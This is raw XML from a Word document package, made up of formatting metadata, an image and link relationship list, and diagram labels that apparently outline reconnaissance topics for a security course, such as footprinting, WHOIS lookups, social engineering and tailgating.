    <w:rsid w:val="00B55406"/>
    <w:rsid w:val="00B56833"/>
    <w:rsid w:val="00B575FE"/>
    <w:rsid w:val="00B576DA"/>
    <w:rsid w:val="00B66FEF"/>
    <w:rsid w:val="00B6713F"/>
    <w:rsid w:val="00B84919"/>
    <w:rsid w:val="00B873ED"/>
    <w:rsid w:val="00B900B0"/>
    <w:rsid w:val="00B913D3"/>
    <w:rsid w:val="00B93855"/>
    <w:rsid w:val="00BA16BF"/>
    <w:rsid w:val="00BA513C"/>
    <w:rsid w:val="00BA785E"/>
    <w:rsid w:val="00BB1ED0"/>
    <w:rsid w:val="00BB2152"/>
    <w:rsid w:val="00BB3E3A"/>
    <w:rsid w:val="00BB685A"/>
    <w:rsid w:val="00BC5D33"/>
    <w:rsid w:val="00BD0755"/>
    <w:rsid w:val="00BD784E"/>
    <w:rsid w:val="00BE1412"/>
    <w:rsid w:val="00BE22A5"/>
    <w:rsid w:val="00BF1615"/>
    <w:rsid w:val="00BF2E6C"/>
    <w:rsid w:val="00C1314F"/>
    <w:rsid w:val="00C143A9"/>
    <w:rsid w:val="00C1657C"/>
    <w:rsid w:val="00C2271A"/>
    <w:rsid w:val="00C24B82"/>
    <w:rsid w:val="00C36ECD"/>
    <w:rsid w:val="00C41E5A"/>
    <w:rsid w:val="00C43944"/>
    <w:rsid w:val="00C551A9"/>
    <w:rsid w:val="00C563E4"/>
    <w:rsid w:val="00C5678A"/>
    <w:rsid w:val="00C57C3F"/>
    <w:rsid w:val="00C656F8"/>
    <w:rsid w:val="00C71AD5"/>
    <w:rsid w:val="00C77794"/>
    <w:rsid w:val="00C800A5"/>
    <w:rsid w:val="00C87CFF"/>
    <w:rsid w:val="00C9539B"/>
    <w:rsid w:val="00CA24C5"/>
    <w:rsid w:val="00CA2DAB"/>
    <w:rsid w:val="00CA3A85"/>
    <w:rsid w:val="00CB1142"/>
    <w:rsid w:val="00CD0916"/>
    <w:rsid w:val="00CD0D97"/>
    <w:rsid w:val="00CD700B"/>
    <w:rsid w:val="00CF046C"/>
    <w:rsid w:val="00CF3C5F"/>
    <w:rsid w:val="00CF72E2"/>
    <w:rsid w:val="00D04AE7"/>
    <w:rsid w:val="00D12CFF"/>
    <w:rsid w:val="00D131BF"/>
    <w:rsid w:val="00D1570E"/>
    <w:rsid w:val="00D20FB1"/>
    <w:rsid w:val="00D21389"/>
    <w:rsid w:val="00D268B0"/>
    <w:rsid w:val="00D332B8"/>
    <w:rsid w:val="00D407B6"/>
    <w:rsid w:val="00D42DDB"/>
    <w:rsid w:val="00D47F15"/>
    <w:rsid w:val="00D54C20"/>
    <w:rsid w:val="00D55F55"/>
    <w:rsid w:val="00D60647"/>
    <w:rsid w:val="00D70297"/>
    <w:rsid w:val="00D76494"/>
    <w:rsid w:val="00D8369F"/>
    <w:rsid w:val="00D86D38"/>
    <w:rsid w:val="00D928AC"/>
    <w:rsid w:val="00D9327B"/>
    <w:rsid w:val="00D95A18"/>
    <w:rsid w:val="00DA1F8B"/>
    <w:rsid w:val="00DA7EFF"/>
    <w:rsid w:val="00DC4836"/>
    <w:rsid w:val="00DD6F25"/>
    <w:rsid w:val="00DE1E8B"/>
    <w:rsid w:val="00DE3513"/>
    <w:rsid w:val="00DF1414"/>
    <w:rsid w:val="00DF4764"/>
    <w:rsid w:val="00DF66F1"/>
    <w:rsid w:val="00E10050"/>
    <w:rsid w:val="00E10F25"/>
    <w:rsid w:val="00E1393A"/>
    <w:rsid w:val="00E14EE3"/>
    <w:rsid w:val="00E2455B"/>
    <w:rsid w:val="00E2563F"/>
    <w:rsid w:val="00E33590"/>
    <w:rsid w:val="00E40457"/>
    <w:rsid w:val="00E40D19"/>
    <w:rsid w:val="00E43B05"/>
    <w:rsid w:val="00E43B97"/>
    <w:rsid w:val="00E442BA"/>
    <w:rsid w:val="00E47A31"/>
    <w:rsid w:val="00E56450"/>
    <w:rsid w:val="00E74F13"/>
    <w:rsid w:val="00E756F1"/>
    <w:rsid w:val="00E83D12"/>
    <w:rsid w:val="00E85742"/>
    <w:rsid w:val="00E94D56"/>
    <w:rsid w:val="00E97023"/>
    <w:rsid w:val="00EA19E0"/>
    <w:rsid w:val="00EA6165"/>
    <w:rsid w:val="00EB12CB"/>
    <w:rsid w:val="00EB12F8"/>
    <w:rsid w:val="00EB3330"/>
    <w:rsid w:val="00EB52E8"/>
    <w:rsid w:val="00EB79E1"/>
    <w:rsid w:val="00EC0AA9"/>
    <w:rsid w:val="00EC21CF"/>
    <w:rsid w:val="00EC21EF"/>
    <w:rsid w:val="00EC6D3C"/>
    <w:rsid w:val="00ED36A7"/>
    <w:rsid w:val="00ED575B"/>
    <w:rsid w:val="00ED66B1"/>
    <w:rsid w:val="00EE0DD4"/>
    <w:rsid w:val="00EE23D2"/>
    <w:rsid w:val="00EE48A9"/>
    <w:rsid w:val="00EE6A0C"/>
    <w:rsid w:val="00EF04B3"/>
    <w:rsid w:val="00F148A7"/>
    <w:rsid w:val="00F17507"/>
    <w:rsid w:val="00F22F1D"/>
    <w:rsid w:val="00F24989"/>
    <w:rsid w:val="00F3066C"/>
    <w:rsid w:val="00F32B5D"/>
    <w:rsid w:val="00F34A8F"/>
    <w:rsid w:val="00F3558E"/>
    <w:rsid w:val="00F410BF"/>
    <w:rsid w:val="00F501C9"/>
    <w:rsid w:val="00F51647"/>
    <w:rsid w:val="00F556D2"/>
    <w:rsid w:val="00F559B2"/>
    <w:rsid w:val="00F56880"/>
    <w:rsid w:val="00F6034E"/>
    <w:rsid w:val="00F61F4A"/>
    <w:rsid w:val="00F6264E"/>
    <w:rsid w:val="00F736CB"/>
    <w:rsid w:val="00F8067B"/>
    <w:rsid w:val="00F84A18"/>
    <w:rsid w:val="00F86326"/>
    <w:rsid w:val="00F87FC9"/>
    <w:rsid w:val="00F9032C"/>
    <w:rsid w:val="00F90AB9"/>
    <w:rsid w:val="00FA25CD"/>
    <w:rsid w:val="00FB119E"/>
    <w:rsid w:val="00FB11A6"/>
    <w:rsid w:val="00FD1756"/>
    <w:rsid w:val="00FD320D"/>
    <w:rsid w:val="00FD3BA4"/>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B1E2"/>
  <w15:docId w15:val="{A7B7F882-4935-4D4B-A677-545E1CF9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C0"/>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410">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="151726541">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="188421740">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="201483611">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1799688357">
          <w:marLeft w:val="360"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="257445074">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="719599964">
          <w:marLeft w:val="360"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="273825165">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82561557">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48565790">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="556867136">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="41443085">
          <w:marLeft w:val="360"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="724060728">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80748611">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="890385132">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4656551">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96685344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6055804">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1905489533">
          <w:marLeft w:val="360"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1106268589">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66358193">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4">
          <w:marLeft w:val="806"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="20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52877197">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4863686">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1636254190">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1678463130">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1747652951">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="790326229">
          <w:marLeft w:val="806"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="200"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1876698401">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78.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout1.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId53" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing2.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpg"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="diagrams/quickStyle4.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.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62.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><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hyperlink" Target="https://www.ardamax.com/keylogger" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpeg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout3.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpg"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors4.xm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diagramData" Target="diagrams/data2.xm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jpg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.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0.jpg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout2.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.jpg"/><Relationship Id="rId97" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing4.xml"/><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image" Target="media/image69.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1.jpg"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.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22.png"/><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4.jp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diagramColors" Target="diagrams/colors3.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="diagrams/data4.xm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2.jpg"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpeg"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.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www.wireshark.org/" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="diagrams/data1.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="diagrams/colors2.xml"/><Relationship Id="rId73" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="diagrams/drawing3.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="diagrams/layout4.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3.jpg"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.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image" Target="media/image56.jp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diagramData" Target="diagrams/data3.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.jpg"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpeg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.jpg"/><Relationship Id="rId155"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FB4FD-9E5A-4A6A-A56B-712C89D3355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94C97DD6-5DB9-4BC9-9682-96520B482485}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>Search engine queries</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB45D3DE-AD65-46CB-B99E-678BE3B069DC}" type="parTrans" cxnId="{AF381C88-EEA6-4CDA-8672-F7F12B5946AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A0242B8-00A0-4A44-AC4D-E3BFB4A09E44}" type="sibTrans" cxnId="{AF381C88-EEA6-4CDA-8672-F7F12B5946AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15F5A2E2-7CF0-473D-89D4-55DDEAB866F5}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>Domain name searches/WHOIS lookups</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14296F04-68A3-4AFD-BFD4-DB038D446DFE}" type="parTrans" cxnId="{C85E46A5-27EF-4192-B270-496EC697EAF3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D898304-0E86-4F7C-A636-2ACB8F00AADB}" type="sibTrans" cxnId="{C85E46A5-27EF-4192-B270-496EC697EAF3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9611B807-A7C5-413C-93B9-55370D02C8CB}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>Social Engineering</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B772E103-9F04-4837-B406-B44E63E8D6F9}" type="parTrans" cxnId="{9CEBC574-B255-4BAD-896A-66E38F90260F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A30386D-B9CC-40D7-BB40-73674715BA6E}" type="sibTrans" cxnId="{9CEBC574-B255-4BAD-896A-66E38F90260F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E035DE4-2C61-41A3-88CB-FF7A5FB1B7EE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>Internet </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0" err="1"/>
            <a:t>Footprinting</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D46CF4A9-7CF6-4D71-B29A-2BFABE50F9F8}" type="parTrans" cxnId="{73E83191-C3B9-42F0-BD2C-91C440210706}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{090B312B-A209-4448-AA17-79621169CBD5}" type="sibTrans" cxnId="{73E83191-C3B9-42F0-BD2C-91C440210706}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17EB77E6-C1BC-460B-BA32-A9FD9BFFEA0F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>Internal </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0" err="1"/>
            <a:t>Footprinting</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D582FB3-F4BD-415A-A223-0878376ABCA4}" type="parTrans" cxnId="{DDDC695C-4634-4800-B3C4-197F682428A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{233141FB-F839-4776-A395-142E20D71613}" type="sibTrans" cxnId="{DDDC695C-4634-4800-B3C4-197F682428A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB290E86-1600-4C6F-AD3A-507A9EC1123F}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>Dumpster Diving</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85E7EB47-FD69-4376-8FDE-956038AC9730}" type="parTrans" cxnId="{5350319E-F753-4F14-A042-C431C5EFF612}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{156491C4-3C2C-47BA-A34E-04C61351D634}" type="sibTrans" cxnId="{5350319E-F753-4F14-A042-C431C5EFF612}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9CC25029-FED1-4C67-B509-BB972EF67C14}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1050" dirty="0"/>
            <a:t>Tailgating</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C58DD4D-2C9B-4D8D-BC10-45902B9AF722}" type="parTrans" cxnId="{3EB545DB-B60C-44D3-B470-217105E846AF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BF962F3-A7CC-483E-A177-470F0B3AC3C2}" type="sibTrans" cxnId="{3EB545DB-B60C-44D3-B470-217105E846AF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31523E9E-8D8D-45B8-A485-EDC5EF938033}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1600" dirty="0"/>
            <a:t>Reconnaissance</a:t>
